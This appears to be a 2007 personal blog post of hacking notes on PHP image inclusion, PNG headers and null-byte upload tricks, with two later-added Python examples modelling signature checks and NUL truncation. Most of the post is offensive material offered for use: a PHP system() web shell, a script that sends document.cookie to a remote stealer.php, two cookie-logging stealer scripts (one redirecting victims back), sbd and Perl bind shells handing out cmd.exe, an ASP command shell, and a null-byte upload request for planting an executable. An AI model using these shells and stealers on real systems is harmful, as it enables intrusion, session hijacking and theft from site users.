It's the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No wait... It should be just RUBY!

20070306

Just some simple shell notes:

Image inclusion
php (serverside - local/remote)
- include()/require() parse the whole target file as PHP, so PHP code hidden in a jpeg comment segment executes when the "image" is included (local or remote file inclusion)
IE (clientside - local)
- sniffs the first bytes of the body instead of trusting the extension/Content-Type, so an "image" whose content is HTML/script gets rendered as HTML

PNG Headers
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <= png signature (8 bytes, always the same; this is all a magic-byte check looks at)
\x00\x00\x00\x0d <= chunk length (13 = size of a real IHDR payload)
\x77\x6f\x6f\x74 <= chunk id "woot" (a real file has "IHDR" here)
\x00\x00\x00\x01 <= width
\x00\x00\x00\x01 <= height
(a real IHDR is width then height, then bit depth, colour type, compression, filter, interlace, followed by a CRC32 over type+data; the bytes above are enough to pass a signature check, not a decoder)
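Added example, not from the original notes: a Python script that assembles the bytes listed above, a real 1x1 PNG, and a PNG with non-image bytes appended (the kind of file the image-inclusion note relies on), then runs the magic-bytes check that most upload code performs beside a chunk-walking check. The "woot" chunk, the marker string and the function names are constructed here; the point is that the 8-byte signature satisfies a magic check while a parser that insists on IHDR first, verifies CRCs and rejects bytes after IEND does not.

```python
"""Constructed example: why the PNG prefix above passes a magic check but not a parser."""
import struct
import zlib

# The 8 signature bytes from the note (\x89 P N G \r \n \x1a \n)
PNG_SIGNATURE = b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"

# The note's prefix exactly as written: length 13, chunk id "woot", then 1 and 1.
# No CRC follows and only 8 of the promised 13 data bytes are present.
NOTE_PREFIX = (
    PNG_SIGNATURE
    + b"\x00\x00\x00\x0d"   # chunk length
    + b"\x77\x6f\x6f\x74"   # chunk id "woot"
    + b"\x00\x00\x00\x01"   # 1
    + b"\x00\x00\x00\x01"   # 1
)


def chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Encode a PNG chunk: big-endian length, 4-byte type, data, CRC32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def ihdr(width: int, height: int) -> bytes:
    """Real IHDR payload (13 bytes): width, height, bit depth 8, greyscale, defaults."""
    return struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)


def minimal_png() -> bytes:
    """A complete, valid 1x1 greyscale PNG."""
    scanline = b"\x00" + b"\x00"  # filter type 0, one 8-bit grey sample
    return (
        PNG_SIGNATURE
        + chunk(b"IHDR", ihdr(1, 1))
        + chunk(b"IDAT", zlib.compress(scanline))
        + chunk(b"IEND", b"")
    )


def polyglot(trailer: bytes) -> bytes:
    """Valid PNG with arbitrary bytes appended; still 'an image' to a magic check."""
    return minimal_png() + trailer


def looks_like_png(blob: bytes) -> bool:
    """The check most upload code does: first 8 bytes only."""
    return blob.startswith(PNG_SIGNATURE)


def structural_problems(blob: bytes) -> list:
    """Walk the chunk list like a decoder would and report what a magic check misses."""
    if not looks_like_png(blob):
        return ["bad signature"]
    problems = []
    pos = len(PNG_SIGNATURE)
    first = True
    saw_iend = False
    while pos + 8 <= len(blob) and not saw_iend:
        length = struct.unpack(">I", blob[pos:pos + 4])[0]
        ctype = blob[pos + 4:pos + 8]
        data = blob[pos + 8:pos + 8 + length]
        crc_bytes = blob[pos + 8 + length:pos + 12 + length]
        if len(data) != length or len(crc_bytes) != 4:
            problems.append(f"truncated chunk {ctype!r}")
            return problems
        expected = zlib.crc32(ctype + data) & 0xFFFFFFFF
        if struct.unpack(">I", crc_bytes)[0] != expected:
            problems.append(f"bad CRC on {ctype!r}")
        if first and ctype != b"IHDR":
            problems.append(f"first chunk is {ctype!r}, not IHDR")
        first = False
        saw_iend = ctype == b"IEND"
        pos += 12 + length
    if not saw_iend:
        problems.append("no IEND chunk")
    elif pos != len(blob):
        problems.append(f"{len(blob) - pos} trailing bytes after IEND")
    return problems


if __name__ == "__main__":
    marker = b"<?php /* constructed marker, not a payload */ ?>"
    for name, blob in [("note prefix", NOTE_PREFIX),
                       ("minimal png", minimal_png()),
                       ("polyglot", polyglot(marker))]:
        print(name, looks_like_png(blob), structural_problems(blob))
```

All three inputs pass looks_like_png(); only the real 1x1 file comes back from structural_problems() clean, which is the difference between "starts with the signature" and "is a PNG".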

Comment writers for jpegs
edjpgcom

Basic php shell
<?php
ob_clean();
system("[command]");
die();
?>


Using Echo
For windows:
echo: ^ (carets) escape cmd.exe's special characters (<, >, |, &) so they are written literally instead of being treated as redirects.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

unix:
write "lol" to a file from hex escapes with no trailing newline (bash builtin echo: -e interprets the escapes, -n drops the newline)
echo -en "\x6c\x6f\x6c" > file.ext


SBD (netcat style, with optional encryption):
File Receiving (Windows listener; NUL is the empty input)
sbd -lvp 1234 < NUL > outfile.ext
Banner Grabbing (-c off disables sbd's encryption so a plain server answers)
sbd -c off -v www.microsoft.com 80
Binding Shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

plink -raw and telnet are cruder substitutes but can work.

Play with Cookies

Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>


Cookie View (cookies flagged HttpOnly do not show up in document.cookie)
javascript:alert(document.cookie);


Manipulate Cookie
javascript:void(document.cookie="variable=value");


stealer.php
<?php
/*Ethernets Cookie Stealer */
/*Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt","a");
fwrite($log, $cookie ."\n");
fclose($log);
?>


Other stealers
<?php
$cookie = $_GET["c"];
$file = fopen('000.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);

// bounce the victim back to the page they came from so nothing looks odd
$Redirect = getenv("HTTP_REFERER");
echo "<script>window.location.replace('" . $Redirect . "')</script>";
?>


Perl shell
#!/usr/bin/perl
# bind shell: listens on $port and hands each connection a cmd.exe (use '/bin/sh -i' on unix)
use Socket;
$port=911;
$proto=getprotobyname('tcp');
$system='cmd.exe';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
# accept forever; CLIENT is closed after each session ends
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
# point the shell's stdin/stdout/stderr at the socket
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
}


ASP quick whoami
<%
Dim objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
set objNetwork = nothing
%>


ASP Shell
- expect WshShell.Exec to fail with error '80070005' (access denied) when the web account may not spawn processes; Run with output redirected to a file, as below, is the fallback
<%
Dim wshell, intReturn
set wshell = server.createobject("wscript.shell")
intReturn = wshell.run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write( intReturn )
set wshell = nothing
%>


Curl into older PHP servers from chroot skeletons (no curl/wget binary in the jail, but PHP's curl extension is still there).

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);   // hand the body back instead of printing it
$file = curl_exec($ch);
print_r(curl_getinfo($ch));   // transfer info is only meaningful after curl_exec()
curl_close($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
$data = $file;

print $data;
?>


Null Bytes
PHP garbage
The null byte is url-encoded as %00. PHP before 5.3.4 passed it straight into the underlying C filesystem call, which stops at the first NUL, so a string-level check still sees ".jpg" while the file actually opened is c99.php:
C:\c99.php%00.jpg

CGI null byte stuff too..
same idea as the php null byte: anything that ends up in a C string is cut at the NUL

ASP null byte
When a filename is sent using a multipart/form-data post the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
(the raw 0x00 byte inside filename= is written as \x00 below because it does not survive copy/paste; the closing boundary ends with --)

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe\x00.png"
Content-Type: text/plain

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"

Upload
-----------------------------AAAAAAAAAAAAA--
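Added example, not part of the original notes: a Python model of the NUL-truncation bug behind both the php and the ASP notes above. It decodes the %00 path, shows what a C-level call sees versus what a string-level extension check sees, pulls the filename out of a multipart body carrying a raw 0x00, and finishes with the hardened check. The request body, paths and function names (decode_path, c_string, safe_filename) are constructed here from the examples on this page.

```python
"""Constructed example: the NUL-truncation bug behind the php and ASP notes above."""
import os
import re
from urllib.parse import unquote

ALLOWED = (".jpg", ".png", ".gif")


def decode_path(url_path: str) -> str:
    """What the script receives: %00 becomes a real NUL character inside the string."""
    return unquote(url_path)


def c_string(s: str) -> str:
    """What a C-level call (fopen, CreateFile, FileSystemObject) sees: up to the first NUL."""
    return s.split("\x00", 1)[0]


def legacy_extension_check(path: str) -> bool:
    """Old-style check on the whole string; the '.jpg' after the NUL makes it pass."""
    return path.lower().endswith(ALLOWED)


# Constructed multipart body modelled on the ASP request above; the raw 0x00 is written as \x00.
BOUNDARY = b"---------------------------AAAAAAAAAAAAA"
CONSTRUCTED_BODY = (
    b"--" + BOUNDARY + b"\r\n"
    + b'Content-Disposition: form-data; name="ExploitFile"; filename="c:\\sbd.exe\x00.png"\r\n'
    + b"Content-Type: text/plain\r\n\r\n"
    + b"(constructed placeholder, not an executable)\r\n"
    + b"--" + BOUNDARY + b"\r\n"
    + b'Content-Disposition: form-data; name="submit"\r\n\r\n'
    + b"Upload\r\n"
    + b"--" + BOUNDARY + b"--\r\n"
)


def multipart_filename(body: bytes, boundary: bytes) -> str:
    """Pull filename= out of the first file part; the quoted value is taken verbatim, NUL and all."""
    for part in body.split(b"--" + boundary):
        m = re.search(rb'filename="([^"]*)"', part)
        if m:
            return m.group(1).decode("latin-1")
    raise ValueError("no file part in body")


def safe_filename(name: str) -> str:
    """Hardened check: reject NUL outright, drop any directory part, allowlist the extension."""
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"disallowed filename {base!r}")
    return base


def is_rejected(name: str) -> bool:
    """True when safe_filename() refuses the name."""
    try:
        safe_filename(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    requested = decode_path("C:\\c99.php%00.jpg")
    print(repr(requested), legacy_extension_check(requested), repr(c_string(requested)))
    fn = multipart_filename(CONSTRUCTED_BODY, BOUNDARY)
    print(repr(fn), repr(c_string(fn)), is_rejected(fn))
```

The two bugs are the same bug: validation runs on the full string, the filesystem runs on the C string, and the NUL sits exactly where those two views diverge. Rejecting NUL before any other check closes it regardless of which runtime or filesystem API is underneath.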
